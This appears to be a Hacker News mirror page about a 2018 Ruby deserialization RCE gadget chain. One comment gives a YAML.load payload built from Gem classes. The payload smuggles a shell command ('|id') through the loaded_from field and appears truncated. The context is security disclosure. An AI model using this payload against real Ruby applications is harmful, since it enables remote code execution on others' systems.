TE
TechEcho
Home24h TopNewestBestAskShowJobs
GitHubTwitter
Home

TechEcho

A tech news platform built with Next.js, providing global tech news and discussions.

GitHubTwitter

Home

HomeNewestBestAskShowJobs

Resources

HackerNews APIOriginal HackerNewsNext.js

© 2025 TechEcho. All rights reserved.

Ruby 2.x Universal RCE Deserialization Gadget Chain (2018)

36 pointsby pentestercrabover 5 years ago

1 comment

pentestercrabover 5 years ago
The same gadget chain can alsobe used to exploit YAML.load [0] with the following:<p><pre><code> --- !ruby&#x2F;object:Gem::Requirement requirements: !ruby&#x2F;object:Gem::DependencyList specs: - !ruby&#x2F;object:Gem::Source::SpecificFile spec: &amp;1 !ruby&#x2F;object:Gem::StubSpecification loaded_from: &quot;|id 1&gt;&amp;2&quot; - !ruby&#x2F;object:Gem::Source::SpecificFile spec: </code></pre> [0] <a href="https:&#x2F;&#x2F;staaldraad.github.io&#x2F;post&#x2F;2019-03-02-universal-rce-ruby-yaml-load&#x2F;" rel="nofollow">https:&#x2F;&#x2F;staaldraad.github.io&#x2F;post&#x2F;2019-03-02-universal-rce-r...</a>